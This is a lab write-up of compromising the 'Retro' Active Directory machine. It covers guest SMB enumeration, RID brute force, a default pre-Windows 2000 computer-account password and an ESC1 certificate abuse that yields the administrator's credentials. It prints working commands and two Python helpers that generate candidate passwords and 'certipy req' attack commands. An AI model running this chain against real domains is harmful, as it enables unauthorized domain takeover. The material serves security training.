Overview
The machine starts with a null/guest SMB session that exposes a Trainees share containing a note about a shared training account. A RID brute force reveals the trainee user, whose password is simply the username. That account can read the Notes share, where a to-do note mentions a pre-created computer account: BANKING$ still has its pre-Windows 2000 default password (the lowercase name without the trailing dollar sign) and authenticates over Kerberos, but not NTLM, until its password is changed. Once changed, the account is a normal member of Domain Computers, which has enrollment rights on the RetroClients template, and that template is vulnerable to ESC1. Requesting a certificate with the administrator's UPN, a 4096-bit key (the template's minimum) and the administrator's SID yields a PFX that authenticates as administrator and returns the NT hash, giving full domain compromise.
Enumeration
As usual, we start with an nmap scan.
nmap -sC -sV -vv -oA init -Pn 10.129.234.44
Nmap scan report for 10.129.234.44
Host is up, received user-set (0.16s latency).
Scanned at 2026-06-03 10:42:05 PDT for 107s
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2026-06-03 09:42:26Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2026-06-03T09:43:49+00:00; -8h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
| SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
<SNIP>
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
| SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
<SNIP>
|_ssl-date: 2026-06-03T09:43:49+00:00; -8h00m00s from scanner time.
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2026-06-03T09:43:50+00:00; -8h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
| SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
<SNIP>
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.retro.vl
| Issuer: commonName=DC.retro.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-06-02T09:30:34
| Not valid after: 2026-12-02T09:30:34
| MD5: 0ebb:6ca3:608f:8c19:b3b9:3939:c14f:b6e1
| SHA-1: 1a9d:230e:7bd5:cb01:027b:dd79:3c19:a364:1a0f:4c31
<SNIP>
|_ssl-date: 2026-06-03T09:43:50+00:00; -8h00m00s from scanner time.
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2026-06-03T09:43:09+00:00
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -8h00m00s, deviation: 0s, median: -8h00m01s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 36202/tcp): CLEAN (Timeout)
| Check 2 (port 15073/tcp): CLEAN (Timeout)
| Check 3 (port 52836/udp): CLEAN (Timeout)
| Check 4 (port 52986/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2026-06-03T09:43:10
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun 3 10:43:52 2026 -- 1 IP address (1 host up) scanned in 106.68 seconds
This is obviously an Active Directory environment, and the scan tells us:
- the domain is retro.vl and the DC's FQDN is DC.retro.vl
- ADCS is in place: the LDAP certificates are issued by the CA retro-DC-CA
- the reported clock skew is a constant -8h00m00s with 0s deviation, i.e. a whole-hour offset in how the two clocks are reported rather than real drift; Kerberos authentication works later on without touching our clock, so we won't worry about it
So let's set up the environment: add the hostname, FQDN and domain name to /etc/hosts, generate a krb5.conf with nxc and move it into place.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ echo '10.129.234.44 DC DC.retro.vl retro.vl' | sudo tee -a /etc/hosts
10.129.234.44 DC DC.retro.vl retro.vl
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ nxc smb 10.129.234.44 -u '' -p '' --generate-krb5-file krb5.conf
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.44 445 DC [+] krb5 conf saved to: krb5.conf
SMB 10.129.234.44 445 DC [+] Run the following command to use the conf file: export KRB5_CONFIG=krb5.conf
SMB 10.129.234.44 445 DC [+] retro.vl\:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ sudo mv krb5.conf /etc/krb5.conf
The krb5.conf generation also reports Null Auth:True, so let's test what an unauthenticated session can see.
Trainees Share as Guest
Authenticating as Guest with an empty password, we get READ on the Trainees share (and on IPC$), so let's take a look.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ nxc smb 10.129.234.44 -u 'Guest' -p '' --shares
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.44 445 DC [+] retro.vl\Guest:
SMB 10.129.234.44 445 DC [*] Enumerated shares
SMB 10.129.234.44 445 DC Share Permissions Remark
SMB 10.129.234.44 445 DC ----- ----------- ------
SMB 10.129.234.44 445 DC ADMIN$ Remote Admin
SMB 10.129.234.44 445 DC C$ Default share
SMB 10.129.234.44 445 DC IPC$ READ Remote IPC
SMB 10.129.234.44 445 DC NETLOGON Logon server share
SMB 10.129.234.44 445 DC Notes
SMB 10.129.234.44 445 DC SYSVOL Logon server share
SMB 10.129.234.44 445 DC Trainees READ
The share holds a single file, Important.txt. It says the trainees kept forgetting their unique passwords, so the admins bundled all of them into one account. We need that account's username, either by guessing from a wordlist or by a RID brute force.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ smbclient //retro.vl/Trainees -U'Guest'%''
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 23 14:58:43 2023
.. DHS 0 Wed Jun 11 07:17:10 2025
Important.txt A 288 Sun Jul 23 15:00:13 2023
4659711 blocks of size 4096. 1325494 blocks available
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> exit
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ cat Important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
My guesses for the username were trainee or trainees, but since Guest has access to the IPC$ pipe we can brute-force RIDs over LSARPC and enumerate every account instead of guessing.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ nxc smb 10.129.234.44 -u 'Guest' -p '' --rid-brute
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.44 445 DC [+] retro.vl\Guest:
SMB 10.129.234.44 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.234.44 445 DC 500: RETRO\Administrator (SidTypeUser)
SMB 10.129.234.44 445 DC 501: RETRO\Guest (SidTypeUser)
SMB 10.129.234.44 445 DC 502: RETRO\krbtgt (SidTypeUser)
SMB 10.129.234.44 445 DC 512: RETRO\Domain Admins (SidTypeGroup)
SMB 10.129.234.44 445 DC 513: RETRO\Domain Users (SidTypeGroup)
SMB 10.129.234.44 445 DC 514: RETRO\Domain Guests (SidTypeGroup)
SMB 10.129.234.44 445 DC 515: RETRO\Domain Computers (SidTypeGroup)
SMB 10.129.234.44 445 DC 516: RETRO\Domain Controllers (SidTypeGroup)
SMB 10.129.234.44 445 DC 517: RETRO\Cert Publishers (SidTypeAlias)
SMB 10.129.234.44 445 DC 518: RETRO\Schema Admins (SidTypeGroup)
SMB 10.129.234.44 445 DC 519: RETRO\Enterprise Admins (SidTypeGroup)
SMB 10.129.234.44 445 DC 520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.234.44 445 DC 521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.234.44 445 DC 522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.234.44 445 DC 525: RETRO\Protected Users (SidTypeGroup)
SMB 10.129.234.44 445 DC 526: RETRO\Key Admins (SidTypeGroup)
SMB 10.129.234.44 445 DC 527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.234.44 445 DC 553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.234.44 445 DC 571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.234.44 445 DC 572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.234.44 445 DC 1000: RETRO\DC$ (SidTypeUser)
SMB 10.129.234.44 445 DC 1101: RETRO\DnsAdmins (SidTypeAlias)
SMB 10.129.234.44 445 DC 1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.234.44 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.129.234.44 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.129.234.44 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB 10.129.234.44 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB 10.129.234.44 445 DC 1109: RETRO\tblack (SidTypeUser)
There is a lot we could do with this trainee user, such as a password brute force that would get there eventually. But think first about why anyone would bundle the trainees into a single account: the admins wanted something they would never have to reset again, so the laziest possible password is the most likely one. My first guess, the password equal to the username, worked:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ nxc smb 10.129.234.44 -u trainee -p trainee
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.44 445 DC [+] retro.vl\trainee:trainee
Notes Share as Trainee
Earlier, as Guest, we saw a Notes share that we could not read. Checking again as trainee shows READ on Notes (plus NETLOGON and SYSVOL), so let's take a look.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ nxc smb 10.129.234.44 -u trainee -p trainee --shares
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.44 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.234.44 445 DC [*] Enumerated shares
SMB 10.129.234.44 445 DC Share Permissions Remark
SMB 10.129.234.44 445 DC ----- ----------- ------
SMB 10.129.234.44 445 DC ADMIN$ Remote Admin
SMB 10.129.234.44 445 DC C$ Default share
SMB 10.129.234.44 445 DC IPC$ READ Remote IPC
SMB 10.129.234.44 445 DC NETLOGON READ Logon server share
SMB 10.129.234.44 445 DC Notes READ
SMB 10.129.234.44 445 DC SYSVOL READ Logon server share
SMB 10.129.234.44 445 DC Trainees READ
The share contains two files, ToDo.txt and user.txt; the latter is presumably the flag (the easiest one we've seen so far).
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ smbclient //retro.vl/Notes -U'trainee'%'trainee'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Apr 8 20:12:49 2025
.. DHS 0 Wed Jun 11 07:17:10 2025
ToDo.txt A 248 Sun Jul 23 15:05:56 2023
user.txt A 32 Tue Apr 8 20:13:01 2025
4659711 blocks of size 4096. 1326768 blocks available
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \> get user.txt
getting file \user.txt of size 32 as user.txt (0.1 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \>
And it is the user flag.

Privilege Escalation
Looking at ToDo.txt, the admins want to clean up after the finance department's old banking software, starting with a pre-created computer account. If you are not familiar with pre-Windows 2000 ("pre2k") computer accounts: when a computer account is created with the "Assign this computer account as a pre-Windows 2000 computer" option, Windows sets its password automatically to the computer name in lowercase, without the trailing dollar sign, truncated to 14 characters. Nobody picks a password, and the account keeps that default until a machine actually joins the domain with it and rotates the password.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ cat ToDo.txt
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
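As an added example (not part of the original writeup), the following script turns the RID brute-force output from earlier into pre2k candidate credentials: it parses the `RID: DOMAIN\name (SidType)` lines that both `nxc smb --rid-brute` and impacket's lookupsid.py print, keeps the computer accounts, and derives each one's default password (lowercase, no trailing `$`, cut to 14 characters). The sample lines are copied from the rid-brute output above, plus one hypothetical long computer name, FINANCEWORKSTATION01$, to show the truncation.

```python
"""Derive pre-Windows 2000 ("pre2k") candidate credentials from RID brute-force output.

Parses the `RID: DOMAIN\\name (SidType)` lines that both `nxc smb --rid-brute`
and impacket's lookupsid.py print, keeps the computer accounts (SidTypeUser
names ending in '$') and derives the password a pre-created computer account
gets by default: the name lowercased, trailing '$' removed, cut to 14 characters.
"""
import re

# Matches the tail of a rid-brute line, e.g. "1106: RETRO\BANKING$ (SidTypeUser)",
# regardless of the "SMB <ip> 445 DC" prefix that nxc puts in front of it.
RID_LINE = re.compile(r"(\d+):\s+([^\\\s]+)\\(.+?)\s+\((SidType\w+)\)\s*$")

# Constructed sample: lines copied from the rid-brute output above plus one
# hypothetical long computer name to show the 14-character truncation.
SAMPLE_OUTPUT = """\
SMB 10.129.234.44 445 DC 500: RETRO\\Administrator (SidTypeUser)
SMB 10.129.234.44 445 DC 515: RETRO\\Domain Computers (SidTypeGroup)
SMB 10.129.234.44 445 DC 1000: RETRO\\DC$ (SidTypeUser)
SMB 10.129.234.44 445 DC 1104: RETRO\\trainee (SidTypeUser)
SMB 10.129.234.44 445 DC 1106: RETRO\\BANKING$ (SidTypeUser)
SMB 10.129.234.44 445 DC 1109: RETRO\\tblack (SidTypeUser)
SMB 10.129.234.44 445 DC 1200: RETRO\\FINANCEWORKSTATION01$ (SidTypeUser)
"""


def parse_rid_lines(text):
    """Return (rid, domain, name, sid_type) for every rid-brute line in text."""
    accounts = []
    for line in text.splitlines():
        match = RID_LINE.search(line)
        if match:
            rid, domain, name, sid_type = match.groups()
            accounts.append((int(rid), domain, name, sid_type))
    return accounts


def pre2k_password(computer_name):
    """Default password of a pre-created computer account.

    Windows sets it to the computer name without the trailing '$', in lower
    case, truncated to 14 characters, so long names lose their tail.
    """
    return computer_name.rstrip("$").lower()[:14]


def pre2k_candidates(text):
    """Map every computer account found in rid-brute output to its pre2k password.

    Joined machines (the DC$ account here) rotate their password, so their
    candidate will simply fail; it costs one logon attempt to find out.
    """
    candidates = {}
    for _rid, _domain, name, sid_type in parse_rid_lines(text):
        if sid_type == "SidTypeUser" and name.endswith("$"):
            candidates[name] = pre2k_password(name)
    return candidates


def nxc_credential_lines(candidates):
    """Render candidates as 'user:password' lines, one pair per account.

    Split them into users.txt and passwords.txt (same order) and run
    `nxc smb <dc> -u users.txt -p passwords.txt --no-bruteforce -k`: each user
    is tried only with the password on the same line, over Kerberos, which is
    the only protocol a still-pre-created account accepts.
    """
    return [f"{user}:{password}" for user, password in sorted(candidates.items())]


if __name__ == "__main__":
    for line in nxc_credential_lines(pre2k_candidates(SAMPLE_OUTPUT)):
        print(line)
```

Run it against the saved output of `nxc smb <dc> -u Guest -p '' --rid-brute` and you get the BANKING$:banking pair directly, without eyeballing the list.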
Looking back at the usernames from the RID brute force, the only computer account besides the DC is BANKING$, so let's try the password banking for it. (This is my usernames.txt from that output; the Cert and RAS entries are just the first words of the Cert Publishers and RAS and IAS Servers groups.)
cat usernames.txt
Administrator
Guest
krbtgt
Cert
RAS
DC$
DnsAdmins
trainee
BANKING$
jburley
tblack
It works, as long as we authenticate with Kerberos (-k):
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ nxc smb 10.129.234.44 -u 'BANKING$' -p banking -k
SMB 10.129.234.44 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.44 445 DC [+] retro.vl\BANKING$:banking
Now let's see if this account can RDP. Without -k the logon is rejected with CredSSP error 0xc0000199, while with -k (Kerberos) it succeeds:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ nxc rdp 10.129.234.44 -u 'BANKING$' -p banking
RDP 10.129.234.44 3389 DC [*] Windows 10 or Windows Server 2016 Build 20348 (name:DC) (domain:retro.vl) (nla:True)
RDP 10.129.234.44 3389 DC [-] retro.vl\BANKING$:banking (CredSSP - Server sent an error! Code: 0xc0000199)
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ nxc rdp 10.129.234.44 -u 'BANKING$' -p banking -k
RDP 10.129.234.44 3389 DC [*] Windows 10 or Windows Server 2016 Build 20348 (name:DC) (domain:retro.vl) (nla:True)
RDP 10.129.234.44 3389 DC [+] retro.vl\BANKING$:banking
0xc0000199 is NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT: the DC refuses an NTLM logon for a computer account that is still in its pre-created state (its password has never been changed), while Kerberos with the same password works, which is why the -k attempts succeeded. To make the account usable over NTLM as well, we change its password. Since we have already validated the credentials with Kerberos, we can do the change over kpasswd (or through RPC) rather than SMB, which would hit the same trust-account error. And it worked:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ changepasswd.py retro.vl/'BANKING$':banking@10.129.234.44 -newpass 'Password123!' -p kpasswd
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of retro.vl\BANKING$
[*] No valid TGT for kadmin/changepw found in cache /home/jimmex/.nxc/modules/pre2k/ccache/banking.ccache
[*] Password was changed successfully.
Even after the password change, an actual RDP session still fails (the connection is reset during the NLA handshake), so RDP is a dead end for this account:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ xfreerdp3 /v:retro.vl /u:'BANKING$' /d:retro.vl /p:'Password123!' /cert:ignore /sec:nla
[03:34:11:767] [94290:00017053] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[03:34:11:769] [94290:00017053] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5D -> no RDP scancode found
[03:34:11:769] [94290:00017053] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: MDSW: keycode: 0xCB -> no RDP scancode found
[03:34:13:469] [94290:00017053] [ERROR][com.freerdp.core.transport] - [transport_read_layer]: BIO_read returned a system error 104: Connection reset by peer
[03:34:13:469] [94290:00017053] [ERROR][com.freerdp.core] - [transport_read_layer]: ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[03:34:15:243] [94290:00017053] [ERROR][com.freerdp.core.transport] - [transport_read_layer]: BIO_read returned a system error 104: Connection reset by peer
[03:34:15:243] [94290:00017053] [ERROR][com.freerdp.core] - [transport_read_layer]: ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[03:34:15:243] [94290:00017053] [ERROR][com.freerdp.core] - [freerdp_connect]: freerdp_post_connect failed
There is also ADCS, which we haven't looked at yet. Let's see what this account can do with it, starting with a query for vulnerable templates using the new password:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ certipy find -u 'BANKING$' -p 'Password123!' -dc-ip 10.129.234.44 -vulnerable
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'retro-DC-CA'
[*] Checking web enrollment for CA 'retro-DC-CA' @ 'DC.retro.vl'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260603033600_Certipy.txt'
[*] Wrote text output to '20260603033600_Certipy.txt'
[*] Saving JSON output to '20260603033600_Certipy.json'
[*] Wrote JSON output to '20260603033600_Certipy.json'
The results show that the RetroClients template is vulnerable to ESC1, which will eventually get us administrator. All the conditions are visible in the listing: the enrollee supplies the subject (so we choose the SAN), the EKU allows Client Authentication (so the certificate can be used for Kerberos PKINIT logon), no manager approval or authorized signatures are required, and Domain Computers, which every computer account including BANKING$ belongs to, has enrollment rights. ESC1 therefore lets us request a certificate for any UPN we like, including the administrator's.
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Template Created : 2023-07-23T21:17:47+00:00
Template Last Modified : 2023-07-23T21:18:39+00:00
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Full Control Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Property Enroll : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
[+] User Enrollable Principals : RETRO.VL\Domain Computers
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
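As an added example (not part of the writeup and not Certipy's own code), here is a small triage script that applies those ESC1 conditions to the JSON file that `certipy find` writes next to its text report, and turns each hit into the `certipy req` command line, adding -key-size when the template's minimum exceeds Certipy's 2048-bit default and always adding -sid. The report dict is constructed from the text listing above and assumes the JSON keys mirror those text labels; the second template, RetroClientsApproved, is a hypothetical hardened variant added as a negative case.

```python
"""Triage `certipy find` JSON output for ESC1 and build the matching `certipy req`.

ESC1 needs all of these on the same template: enabled, enrollee supplies the
subject (so the requester picks the SAN), an EKU allowing client authentication
(or Any Purpose), no manager approval, no required authorized signatures, and
enrollment rights held by a principal we control.
"""

# Constructed from the certipy text report shown above; key names are assumed
# to mirror the labels of that text output.
RETRO_CLIENTS = {
    "Template Name": "RetroClients",
    "Certificate Authorities": ["retro-DC-CA"],
    "Enabled": True,
    "Client Authentication": True,
    "Any Purpose": False,
    "Enrollee Supplies Subject": True,
    "Requires Manager Approval": False,
    "Authorized Signatures Required": 0,
    "Minimum RSA Key Length": 4096,
    "Permissions": {
        "Enrollment Permissions": {
            "Enrollment Rights": [
                "RETRO.VL\\Domain Admins",
                "RETRO.VL\\Domain Computers",
                "RETRO.VL\\Enterprise Admins",
            ]
        }
    },
}

# Hypothetical hardened copy used as a negative case: manager approval required.
RETRO_CLIENTS_APPROVED = {
    **RETRO_CLIENTS,
    "Template Name": "RetroClientsApproved",
    "Requires Manager Approval": True,
}

SAMPLE_REPORT = {
    "Certificate Templates": {"0": RETRO_CLIENTS, "1": RETRO_CLIENTS_APPROVED}
}

CERTIPY_DEFAULT_KEY_SIZE = 2048  # key size `certipy req` generates unless -key-size is given


def enrollment_rights(template):
    """Principals allowed to enroll in the template (empty list if none listed)."""
    perms = template.get("Permissions", {}).get("Enrollment Permissions", {})
    return perms.get("Enrollment Rights") or []


def esc1_findings(report, held_principals):
    """Return one finding per (template, CA) meeting the ESC1 conditions for a
    caller whose token carries `held_principals`, e.g. RETRO.VL\\Domain Computers
    for any computer account such as BANKING$."""
    held = {p.lower() for p in held_principals}
    findings = []
    for template in report.get("Certificate Templates", {}).values():
        if not template.get("Enabled"):
            continue
        if not template.get("Enrollee Supplies Subject"):
            continue
        if not (template.get("Client Authentication") or template.get("Any Purpose")):
            continue
        if template.get("Requires Manager Approval"):
            continue
        if template.get("Authorized Signatures Required", 0):
            continue
        usable = [r for r in enrollment_rights(template) if r.lower() in held]
        if not usable:
            continue
        for ca in template.get("Certificate Authorities", []):
            findings.append({
                "template": template["Template Name"],
                "ca": ca,
                "enroll_as": usable,
                "min_key_size": template.get("Minimum RSA Key Length", CERTIPY_DEFAULT_KEY_SIZE),
            })
    return findings


def certipy_req_command(finding, user, password, dc_ip, target, upn, sid):
    """Build the `certipy req` line for a finding.

    Adds -key-size when the template's minimum exceeds Certipy's default (the
    CERTSRV_E_KEY_LENGTH failure seen on this box) and always adds -sid so the
    certificate carries the target's object SID for strong certificate mapping.
    """
    parts = [
        "certipy", "req", "-u", f"'{user}'", "-p", f"'{password}'", "-dc-ip", dc_ip,
        "-template", f"'{finding['template']}'", "-ca", f"'{finding['ca']}'",
        "-target", target, "-upn", f"'{upn}'", "-sid", f"'{sid}'",
    ]
    if finding["min_key_size"] > CERTIPY_DEFAULT_KEY_SIZE:
        parts += ["-key-size", str(finding["min_key_size"])]
    return " ".join(parts)


if __name__ == "__main__":
    domain_sid = "S-1-5-21-2983547755-698260136-4283918172"  # from lookupsid.py on this box
    for finding in esc1_findings(SAMPLE_REPORT, ["RETRO.VL\\Domain Computers"]):
        print(certipy_req_command(finding, "BANKING$", "Password123!", "10.129.234.44",
                                  "dc.retro.vl", "administrator@retro.vl", f"{domain_sid}-500"))
```

Load the real JSON with `json.load()` and pass the groups your principal actually holds; the generated command already includes the two flags that cost a few failed attempts below, the 4096-bit key size and the target SID.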
But the first request fails with this error:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ certipy req -u 'BANKING$' -p 'Password123!' -dc-ip 10.129.234.44 -template 'RetroClients' -ca 'retro-DC-CA' -upn 'administrator@retro.vl' -target dc.retro.vl
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 10
[-] Got error while requesting certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
Would you like to save the private key? (y/N):
The cause is in the template listing above: Minimum RSA Key Length is 4096, while certipy generates a 2048-bit key by default, so the CA rejects the request with CERTSRV_E_KEY_LENGTH. Passing -key-size 2048 explicitly is rejected for the same reason:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/retro]
└──╼ [★]$ certipy req -u 'BANKING$' -p 'Password123!' -dc-ip 10.129.234.44 -template 'RetroClients' -ca 'retro-DC-CA' -upn 'administrator@retro.vl' -target dc.retro.vl -key-size 2048
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 11
[-] Got error while requesting certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
Would you like to save the private key? (y/N): N
[-] Failed to request certificate
With -key-size 4096 the request succeeds and we get a PFX. Note certipy's warning that the certificate carries no object SID:
